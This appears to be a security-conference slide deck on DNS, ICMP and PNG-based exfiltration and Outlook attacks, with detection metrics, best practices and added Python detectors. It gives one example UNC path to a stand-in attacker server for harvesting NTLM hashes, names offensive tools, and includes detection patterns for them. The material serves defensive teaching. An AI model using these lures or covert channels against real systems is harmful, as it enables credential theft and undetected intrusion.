Advanced Exploitation Techniques and Defence Strategies


#whoami
👉 Chirag Savla
👉 Twitter – @chiragsavla94
👉 Interest area – Red Teaming, Application Security,
Penetration Testing
👉 Blog – https://3xpl01tc0d3r.blogspot.com

#whoami
👉 Udayakumar C
👉 Twitter – @udayakumar2526
👉 Interest area – Threat Hunting, Incident Response

"As an offensive researcher, if you can dream it, someone has likely already done it… and that someone isn’t the kind of person who speaks at security cons."
— Matt Graeber

Agenda

▸ DNS attacks
▸ PNG & ICMP attacks
▸ Outlook attacks
▸ Best Practices

DNS attacks
▸ Data Exfiltration over DNS & DNS Tunneling
▸ Detection Metrics
▸ Visual Inspection

About DNS

▸ The Domain Name System (DNS) is a system designed so that we as humans don’t have to remember IP addresses when browsing the internet.
▸ The DNS protocol is mainly designed to resolve a hostname query into an IP address response.
▸ The query is performed recursively, starting from the root DNS name servers until reaching the authoritative name server defined for the queried domain.

Data Exfiltration over DNS & DNS Tunneling

▸ DNS data exfiltration is a way to exchange data between two computers without any direct connection; the data is exchanged through the DNS protocol via intermediate DNS servers.
▸ DNS tunneling is a method that encodes the data of other programs or protocols in DNS queries and responses.
▸ Why DNS?
▹ A cornerstone of the Internet; available in almost every network
▹ Rarely monitored compared to HTTP, FTP and e-mail protocols
Targeted Attacks against Banks in the Middle East

https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html

FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings

https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html

Demo Time
This is not rocket science.

Detection Metrics

▸ Lots of requests to domains / a single domain
▸ Spike in DNS byte count compared to normal traffic patterns
▸ MD5, SHA1, SHA256 hashed subdomains
▸ Encrypted payloads
▸ Plain-text requests of subdomains
▸ DNS replies have private addresses
▸ DNS replies have a single IP address
▸ DNS replies have patterned encoding
▸ Packet size outside the normal distribution
▸ Pattern of many requests to specific domains in a round-robin pattern

Detection Metric 1 - High volume of traffic (chart slide)

Detection Metric 2 - Increase in Bytes Transferred (chart slide)

Detection Metric 3 - Anomalous Queries (chart slide)

Demo Time
This is not rocket science.

Visual Inspection

Legitimate DNS traffic versus tunneled DNS traffic:

▸ Resolver path. Legitimate: DNS requests will always go through the internal DNS servers. Tunneled: DNS requests can (but don’t need to) bypass the local DNS server.
▸ Hostname readability. Legitimate: hostnames will look like/include dictionary words. Tunneled: hostnames will look nothing like words a human can read (high level of entropy).
▸ Query length. Legitimate: short-ish DNS queries and responses. Tunneled: very long DNS queries and responses.
▸ Numerical characters. Legitimate: small percentage of numerical characters in hostnames. Tunneled: high percentage of numerical characters in hostnames.
▸ Consonant blocks. Legitimate: hostnames are unlikely to include repeated consonants, or blocks including only consonants and numbers. Tunneled: hostnames will very frequently include repeated consonants, and/or blocks including only consonants and numbers.
▸ Record types. Legitimate: DNS records will likely be of the most common types, i.e. A records, MX records and so on. Tunneled: likely to use uncommon DNS record types heavily, e.g. TXT records.
▸ Traffic distribution. Legitimate: DNS traffic to different IPs/domains will be somewhat “even”. Tunneled: a very high volume of DNS traffic to a single IP and/or domain is likely (but not mandatory).
▸ Hostnames per domain. Legitimate: likely to show just a few hostnames per domain. Tunneled: likely to show a huge number of hostnames per domain.
▸ Preceding activity. Legitimate: a DNS request is preceded by another request from some application. Tunneled: a DNS request is unlikely to be preceded by another request from some application.
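The detection metrics and the visual-inspection indicators above can be turned into a scoring check over a DNS query log: aggregate per registered domain, then test name length, entropy, digit share, consonant/digit blocks, record-type mix and hostname count. The following Python is an added example, not code from the deck or its authors; the log-line format, the thresholds, the set of "uncommon" record types and the last-two-labels rule for the registered domain are assumptions, and the log lines are constructed.

```python
import math
import re
from collections import defaultdict

# Constructed sample of DNS query-log lines (not from the original deck):
# "<time> <client_ip> <queried_name> <record_type>"
SAMPLE_DNS_LOG = """\
10:00:01 10.0.0.5 www.example.com A
10:00:02 10.0.0.5 mail.example.com MX
10:00:03 10.0.0.7 cdn.example.net A
10:00:04 10.0.0.9 4a7f3b9c2d1e8f0a1b2c3d4e5f6a7b8c.tunnel.example.org TXT
10:00:04 10.0.0.9 9e8d7c6b5a4f3e2d1c0b9a8f7e6d5c4b.tunnel.example.org TXT
10:00:05 10.0.0.9 0f1e2d3c4b5a69788796a5b4c3d2e1f0.tunnel.example.org TXT
10:00:05 10.0.0.9 5c4d3e2f1a0b9c8d7e6f5a4b3c2d1e0f.tunnel.example.org TXT
10:00:06 10.0.0.9 a1b2c3d4e5f60718293a4b5c6d7e8f90.tunnel.example.org TXT
10:00:07 10.0.0.5 login.example.com A
"""

# Assumed set of record types that are rare in normal client traffic.
UNCOMMON_TYPES = {"TXT", "NULL"}
# A run of consonants and digits with no vowel in between ("consonant blocks").
CONSONANT_DIGIT_RUN = re.compile(r"[bcdfghjklmnpqrstvwxz0-9]+")


def shannon_entropy(text):
    """Bits of entropy per character of `text` (0.0 for an empty string)."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname):
    """Return (subdomain_part, registered_domain) using a naive last-two-labels rule."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def parse_log(text):
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4:
            yield {"time": parts[0], "client": parts[1], "qname": parts[2], "qtype": parts[3]}


def score_domains(text):
    """Aggregate queries per registered domain and score the tunneling indicators."""
    agg = defaultdict(lambda: {"queries": 0, "subs": set(), "uncommon": 0,
                               "len": [], "entropy": [], "digits": [], "runs": []})
    for rec in parse_log(text):
        sub, dom = split_name(rec["qname"])
        a = agg[dom]
        a["queries"] += 1
        a["subs"].add(sub)
        a["uncommon"] += rec["qtype"] in UNCOMMON_TYPES
        a["len"].append(len(sub))
        a["entropy"].append(shannon_entropy(sub))
        a["digits"].append(sum(ch.isdigit() for ch in sub) / len(sub) if sub else 0.0)
        a["runs"].append(max((len(m) for m in CONSONANT_DIGIT_RUN.findall(sub)), default=0))
    results = {}
    for dom, a in agg.items():
        mean = lambda xs: sum(xs) / len(xs)
        indicators = {                                   # assumed thresholds
            "long_names": mean(a["len"]) > 20,
            "high_entropy": mean(a["entropy"]) > 3.5,
            "digit_heavy": mean(a["digits"]) > 0.3,
            "consonant_digit_blocks": max(a["runs"]) >= 6,
            "uncommon_record_types": a["uncommon"] / a["queries"] > 0.5,
            "many_hostnames": len(a["subs"]) >= 5,
        }
        results[dom] = {"queries": a["queries"],
                        "score": sum(indicators.values()),
                        "indicators": indicators}
    return results


def flagged_domains(text, min_score=3):
    """Registered domains that trip at least `min_score` indicators."""
    return sorted(d for d, r in score_domains(text).items() if r["score"] >= min_score)


if __name__ == "__main__":
    for dom, r in score_domains(SAMPLE_DNS_LOG).items():
        print(dom, r["queries"], r["score"], [k for k, v in r["indicators"].items() if v])
    print("flagged:", flagged_domains(SAMPLE_DNS_LOG))
```

On the constructed log only example.org trips the indicators (all six); the legitimate names score zero. In production, replace the last-two-labels rule with the public suffix list, baseline the thresholds per environment (CDN and cloud hostnames are long and digit-heavy by design), and combine the score with the deck's volume and byte-count metrics rather than alerting on any single indicator.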

PNG & ICMP exploits

▸ Delivering payloads using PNG file
▸ Data Exfiltration over ICMP
▸ Detection Metrics

Delivering payloads using PNG file

▸ A PNG file is an image file stored in the Portable Network Graphics (PNG) format. It contains a bitmap of indexed colors and uses lossless compression, similar to a .GIF file but without copyright limitations. PNG files are commonly used to store graphics for web images.
▸ Why PNG?
Image files are not monitored or scanned, and they can be hosted on any legitimate site that is allowed in corporate environments.
HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group

https://assets.documentcloud.org/documents/2186063/apt29-hammertoss-stealthy-tactics-define-a.pdf

Data Exfiltration over ICMP

▸ Internet Control Message Protocol (ICMP) is a TCP/IP network-layer protocol that provides troubleshooting, control and error message services. ICMP is most frequently used in operating systems for networked computers.
▸ Why ICMP?
ICMP packets are rarely monitored.
Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations

PHOREAL
• C2 communication via ICMP
• Reverse shell creation
• File system manipulation
• Registry manipulation
• Process creation
• File upload

https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html

Demo Time
This is not rocket science.

Detection Metrics

▸ Encrypted/plaintext ICMP echo packets
▸ Spike in ICMP packet byte count compared to normal traffic patterns
▸ Lots of echo requests to one domain/IP
▸ ICMP packet size outside the normal distribution
▸ Pattern of many requests to a specific domain/IP
▸ PowerShell process making HTTP/HTTPS requests to an image file.
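The ICMP metrics above can be checked against captured echo-request records much like the DNS metrics: compare each payload against what the OS ping utilities actually send, measure payload size and entropy, and count requests per destination over a window. The following Python is an added example, not code from the deck or from icmpsh; the record shape, the standard-payload patterns assumed for Windows and Linux ping, and the thresholds are assumptions, and the records are constructed.

```python
import math
from collections import defaultdict

# Assumed reference payloads: Windows ping sends a 32-byte alphabet pattern,
# Linux ping sends 56 bytes (8-byte timestamp followed by 0x10..0x3F).
WIN_PING = b"abcdefghijklmnopqrstuvwabcdefghi"
LINUX_PING_TAIL = bytes(range(0x10, 0x40))


def shannon_entropy(data):
    """Bits of entropy per byte of `data`."""
    if not data:
        return 0.0
    counts = defaultdict(int)
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def is_standard_payload(payload):
    return payload == WIN_PING or (len(payload) == 56 and payload[8:] == LINUX_PING_TAIL)


def make_sample():
    """Constructed echo-request records: (time_s, src_ip, dst_ip, payload_bytes)."""
    records = []
    for t in range(4):  # two hosts doing ordinary pings to the gateway
        records.append((t, "10.0.0.5", "10.0.0.1", WIN_PING))
        records.append((t, "10.0.0.7", "10.0.0.1", bytes(8) + LINUX_PING_TAIL))
    # one host pushing 900-byte high-entropy payloads to a single external address, 12 times in 12 s
    blob = bytes((i * 73 + 17) % 256 for i in range(900))
    for t in range(12):
        records.append((t, "10.0.0.9", "203.0.113.10", blob))
    return records


def score_destinations(records, window_s=60, max_standard_size=56,
                       volume_threshold=10, entropy_threshold=6.0):
    """Per destination, count the indicators tripped (assumed thresholds)."""
    per_dst = defaultdict(lambda: {"count": 0, "bytes": 0, "nonstandard": 0, "oversized": 0,
                                   "high_entropy": 0, "first": None, "last": None})
    for t, src, dst, payload in records:
        d = per_dst[dst]
        d["count"] += 1
        d["bytes"] += len(payload)
        d["nonstandard"] += not is_standard_payload(payload)
        d["oversized"] += len(payload) > max_standard_size
        d["high_entropy"] += shannon_entropy(payload) > entropy_threshold
        d["first"] = t if d["first"] is None else min(d["first"], t)
        d["last"] = t if d["last"] is None else max(d["last"], t)
    results = {}
    for dst, d in per_dst.items():
        span = max(d["last"] - d["first"], 1)
        indicators = {
            "nonstandard_payload": d["nonstandard"] > 0,
            "oversized_payload": d["oversized"] > 0,
            "high_entropy_payload": d["high_entropy"] > 0,   # encrypted/encoded content
            "high_volume": d["count"] >= volume_threshold and span <= window_s,
        }
        results[dst] = {"count": d["count"], "bytes": d["bytes"],
                        "score": sum(indicators.values()), "indicators": indicators}
    return results


def flagged_destinations(records, min_score=2):
    return sorted(dst for dst, r in score_destinations(records).items() if r["score"] >= min_score)


if __name__ == "__main__":
    for dst, r in score_destinations(make_sample()).items():
        print(dst, r["count"], r["bytes"], r["score"])
    print("flagged:", flagged_destinations(make_sample()))
```

The gateway destination scores zero because every payload matches a known ping pattern; the external destination trips all four indicators. A real deployment would learn the size and volume baselines from its own traffic, since monitoring tools and some load balancers also send non-default ICMP payloads.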

Demo Time
This is not rocket science.

Outlook attacks
▸ Credentials Harvesting
▸ Attacking outlook rules
▸ Establish covert C2 channel via outlook
▸ Detection Metrics

Credentials Harvesting

▸ Leaking of hashes is not new. It is caused by a design flaw in Windows related to its single sign-on implementation. If a server requests that the user authenticate, Windows will try to do so using the user's credentials. This way the user doesn't need to provide his/her credentials for each individual server. The downside is that any server can request authentication and Windows will happily comply.
▸ There are a couple of ways to obtain credentials from the user via Outlook:
▹ Send an email which contains an SMB call to a server which is under the attacker’s control
▹ Eg:- \\attackerserver\demo.jpg
▹ Send an email with a malicious RTF file (CVE-2018-0950)
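A mail-gateway check for the first technique is to scan the HTML body of an inbound message for UNC paths (\\host\share\...) and file:// URLs in tag attributes and text, and flag any host that is not one of the organisation's own. The following Python is an added example, not code from the deck; the attribute list, the internal-suffix allow-list and the sample message are constructed assumptions (the \\attackerserver\demo.jpg reference is the one shown on the slide).

```python
import re
from html.parser import HTMLParser

# UNC path (\\host\share...) and file://host/... references that would trigger an SMB connection.
UNC_RE = re.compile(r"\\\\([A-Za-z0-9.\-]+)\\[^\s\"'<>]*")
FILE_URL_RE = re.compile(r"file:///*([A-Za-z0-9.\-]+)/[^\s\"'<>]*", re.IGNORECASE)
# Attributes that make a mail client fetch a resource (assumed list).
REF_ATTRS = {"src", "href", "background", "poster", "data"}


class RemoteRefScanner(HTMLParser):
    """Collects (where, host, raw_reference) for every SMB-style reference in the HTML."""

    def __init__(self):
        super().__init__()
        self.refs = []

    def _check(self, where, value):
        for rx in (UNC_RE, FILE_URL_RE):
            for m in rx.finditer(value):
                self.refs.append((where, m.group(1).lower(), m.group(0)))

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name.lower() in REF_ATTRS and value:
                self._check("%s[%s]" % (tag, name), value)

    def handle_data(self, data):
        self._check("text", data)


def scan_html(html, internal_suffixes=(".corp.example",)):
    """Return each reference found; `external` is True unless the host matches an internal suffix."""
    scanner = RemoteRefScanner()
    scanner.feed(html)
    scanner.close()
    return [{"where": where, "host": host, "raw": raw,
             "external": not host.endswith(internal_suffixes)}
            for where, host, raw in scanner.refs]


def external_hosts(html, internal_suffixes=(".corp.example",)):
    return sorted({r["host"] for r in scan_html(html, internal_suffixes) if r["external"]})


# Constructed sample message: a 1x1 tracking image pointing at an outside SMB host,
# an ordinary HTTPS image, and a link to an internal file server.
SAMPLE_MAIL = r"""<html><body>
<p>Quarterly numbers attached.</p>
<img src="\\attackerserver\demo.jpg" width="1" height="1">
<img src="https://cdn.example.com/logo.png">
<a href="file://fileserver.corp.example/share/report.docx">report</a>
</body></html>"""


if __name__ == "__main__":
    for ref in scan_html(SAMPLE_MAIL):
        print(ref)
    print("external SMB hosts:", external_hosts(SAMPLE_MAIL))
```

Only the UNC image source is reported as external; the HTTPS image is not an SMB reference at all and the internal file-server link is allow-listed. This check complements, rather than replaces, the egress block on SMB ports listed under Best Practices: the block stops the authentication from leaving the network, the scan tells you who was targeted.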

Credentials Harvesting (diagram slide)

Attacking outlook rules

▸ A rule is an action that Outlook runs automatically on incoming or outgoing messages. You can choose what triggers the rule as well as the actions. Eg:- You can create a rule to move all emails from your manager to a separate folder, or to delete all emails with “Buy Now!” in the subject.
▸ Patches released by Microsoft: CVE-2017-8506, CVE-2017-8507, CVE-2017-8508

Exploiting outlook rules (diagram slide)

Establish covert C2 channel via outlook

Getting access to an internal network is always great; keeping this access can be a whole other challenge. At times we want to fly below the radar and ensure our access doesn’t get detected or blocked by traditional network-based solutions. To this end, communicating directly through an Exchange server can be very beneficial and solve both challenges.

Establish covert C2 channel via outlook

Attacker <-> Exchange <-> Victim (diagram slide)

Exploiting outlook rules

https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html

Demo Time
This is not rocket science.

Detection Metrics

▸ Monitor all outbound communications on ports 445/tcp, 137/tcp and 139/tcp, along with 137/udp and 139/udp.
▸ Enable logging for PowerShell and monitor it.
▸ Use the notruler tool to detect attacks performed using ruler.
▸ Monitor for files written to “%systemdrive%\windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore”.
▸ Monitor the IIS logs of the Exchange server for any user-agent containing “Ruler”.
▸ Monitor for child processes spawned by the MS Office suite.
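Two of the metrics above, the user-agent match in the Exchange server's IIS logs and outbound traffic on the SMB/NetBIOS ports, can be implemented as a log check. The following Python is an added example, not code from the deck, from ruler or from notruler; the W3C field names are the standard IIS ones, but the log lines, the flow-record format, the internal address range and the sample user-agent string are constructed assumptions.

```python
import ipaddress
from collections import defaultdict

# Constructed IIS W3C log excerpt from an Exchange front end (not from the deck).
# IIS writes the user agent with spaces replaced by '+'.
SAMPLE_IIS_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem cs-username c-ip cs(User-Agent) sc-status
2019-01-15 10:00:01 POST /mapi/emsmdb/ CORP\\alice 10.0.0.5 Microsoft+Office/16.0+(Windows+NT+10.0;+Microsoft+Outlook+16.0.4266;+Pro) 200
2019-01-15 10:00:05 POST /autodiscover/autodiscover.xml CORP\\bob 198.51.100.7 ruler 200
2019-01-15 10:00:06 POST /mapi/emsmdb/ CORP\\bob 198.51.100.7 ruler 200
2019-01-15 10:00:09 POST /mapi/emsmdb/ CORP\\carol 10.0.0.8 Microsoft+Office/16.0+(Windows+NT+10.0;+Microsoft+Outlook+16.0.4266;+Pro) 200
"""

# Constructed firewall flow records: "<time> <src> <dst> <proto> <dport> <action>"
SAMPLE_FLOWS = """\
10:00:01 10.0.0.5 10.0.0.20 tcp 445 allow
10:00:02 10.0.0.5 203.0.113.50 tcp 445 allow
10:00:03 10.0.0.8 203.0.113.50 udp 137 allow
10:00:04 10.0.0.8 93.184.216.34 tcp 443 allow
"""

INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]  # assumed corporate range
# Ports from the deck's metric: 445/tcp, 137/tcp, 139/tcp, 137/udp, 139/udp.
SMB_PORTS = {("tcp", 445), ("tcp", 137), ("tcp", 139), ("udp", 137), ("udp", 139)}


def parse_w3c(text):
    """Yield one dict per data line, keyed by the names in the #Fields: directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or not line.strip() or fields is None:
            continue
        yield dict(zip(fields, line.split()))


def find_ruler_sessions(text, marker="ruler"):
    """Map (user, client_ip) -> set of URIs for requests whose user agent contains `marker`."""
    hits = defaultdict(set)
    for rec in parse_w3c(text):
        if marker in rec.get("cs(User-Agent)", "").lower():
            hits[(rec["cs-username"], rec["c-ip"])].add(rec["cs-uri-stem"])
    return dict(hits)


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def find_smb_egress(text):
    """Flows from an internal source to an external destination on an SMB/NetBIOS port."""
    egress = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 6:
            continue
        t, src, dst, proto, dport, action = parts
        if (proto, int(dport)) in SMB_PORTS and is_internal(src) and not is_internal(dst):
            egress.append({"time": t, "src": src, "dst": dst, "proto": proto,
                           "dport": int(dport), "action": action})
    return egress


if __name__ == "__main__":
    for (user, ip), uris in find_ruler_sessions(SAMPLE_IIS_LOG).items():
        print("ruler-like client:", user, ip, sorted(uris))
    for flow in find_smb_egress(SAMPLE_FLOWS):
        print("SMB egress:", flow)
```

The user-agent match is a cheap first filter; pair it with the notruler check and with MAPI/HTTP or EWS logons from addresses that never ran a real Outlook client. For the flow check, an `allow` action on a flagged row means the Best Practices egress block is missing or has an exception, which is itself worth an alert.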

Best Practices

▸ Block all outbound communications on ports 445/tcp, 137/tcp and 139/tcp, along with 137/udp and 139/udp.
▸ Block NT LAN Manager (NTLM) Single Sign-on (SSO) authentication.
▸ Always use complex passwords that are difficult to crack.
▸ Block all outbound ICMP requests.
▸ Block all outbound DNS requests which are sent directly from end systems. All systems should query the internal DNS servers, and only the internal DNS servers should be allowed to send DNS requests outside the environment.
▸ Apply security patches in a timely manner.
▸ Enable Attack Surface Reduction (ASR) rules.
▸ Implement AppLocker & Device Guard.
▸ Disable PowerShell in the environment.
▸ Implement a DNS sinkhole.
▸ Implement 2FA for authentication.

Credits

Thanks to FIRST & CERT-In for granting us the privilege to present.
Special thanks to @_staaldraad & @mr64bit who helped in getting some bugs fixed.

Reference

▸ https://www.blackhillsinfosec.com/powershell-dns-command-control-with-dnscat2-powershell/
▸ https://silentbreaksecurity.com/malicious-outlook-rules/
▸ https://sensepost.com/blog/2017/liniaal-empire-through-exchange/
▸ https://www.youtube.com/watch?v=tuc8cwOAAcA
▸ https://github.com/peewpw/Invoke-PSImage
▸ https://github.com/inquisb/icmpsh
▸ http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-5.html

THANKS!
Any questions?
You can find us at @chiragsavla94 & @udaykumar2526
